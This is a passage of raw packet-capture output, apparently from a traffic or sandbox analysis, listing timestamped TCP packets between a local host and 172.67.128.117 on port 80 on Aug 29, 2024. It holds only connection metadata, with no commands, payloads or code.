                                  Aug 29, 2024 23:42:07.751755953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.751760006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.751770020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.751781940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.751781940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.751800060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.751821995 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752023935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752034903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752064943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752079010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752203941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752214909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752226114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752238989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752250910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752269983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752274990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752274990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752281904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752294064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752299070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752306938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752316952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752322912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752326965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752334118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752346039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752347946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752358913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752371073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752372026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752382994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752391100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752396107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752408028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752413034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752419949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752430916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752432108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752444029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752454996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752454996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752485037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752501965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752727985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752774954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752804041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752816916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752827883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752840042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752851963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.752866983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752888918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.752898932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.838836908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838849068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838860035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838903904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838917017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838928938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838941097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.838953972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839029074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839041948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839090109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839119911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839132071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839143038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839154005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839165926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839170933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839179039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839214087 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839224100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839251041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839262962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839273930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839287996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839299917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839309931 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839327097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839339018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839340925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839380026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839381933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839392900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839404106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839426994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839442015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839452028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839462042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839473963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839485884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839492083 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839520931 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839545012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839730024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839741945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839751959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839765072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839777946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839782953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839790106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839807987 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839818001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839838982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839864016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839883089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839900970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839912891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839929104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839934111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839941025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839953899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839962006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.839967966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.839994907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840023994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840048075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840059996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840076923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840090036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840101004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840106964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840118885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840130091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840131044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840152025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840182066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840379953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840390921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840400934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840415001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840426922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840430975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840439081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840451956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840461016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840462923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840475082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840487957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840492010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840504885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840516090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840516090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840529919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840536118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840545893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840559959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840574026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840586901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840604067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840648890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840775967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840787888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840797901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840809107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840821028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840828896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840832949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840846062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840854883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840866089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840866089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840879917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840890884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840890884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840903997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840910912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840915918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840929031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840930939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840944052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840951920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840960026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.840972900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.840991974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841011047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841149092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841223001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841293097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841305017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841322899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841339111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841351986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841356039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841365099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841378927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841383934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841392040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841403961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841403961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841415882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841423035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841429949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841440916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841449976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841454029 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841481924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841501951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841658115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841675997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841691017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841701984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841713905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841715097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841725111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841737032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841748953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841749907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841764927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841769934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841777086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841789961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841804028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841804028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841816902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841828108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841833115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841841936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841856003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841877937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841914892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841963053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841974974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841985941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841995955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.842016935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.842052937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927469969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927730083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927746058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927756071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927761078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927767992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927781105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927792072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927802086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927810907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927813053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927826881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927843094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927855015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927855968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927866936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927874088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927881002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927892923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927900076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927906036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927916050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927918911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927933931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927937031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927947998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927961111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927962065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927977085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927989006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927999973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927999973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928013086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928028107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928037882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928067923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928088903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928100109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928109884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928121090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928133965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928137064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928145885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928165913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928175926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928200960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928234100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928296089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928307056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928318024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928339005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928364038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928445101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928457022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928467035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928500891 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928523064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928531885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928544044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928554058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928565979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928582907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928585052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928597927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928608894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928611040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928622007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928631067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928633928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928651094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928675890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928682089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928694010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928704977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928718090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928730011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928731918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928741932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928747892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928755999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928767920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928793907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928930998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928944111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928955078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928981066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928992033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929055929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929068089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929078102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929083109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929089069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929094076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929105997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929116011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929208994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929224968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929238081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929291010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929327011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929339886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929351091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929353952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929366112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929377079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929384947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929388046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929402113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929411888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929413080 CEST8049730172.67.128.117192.168.2.4
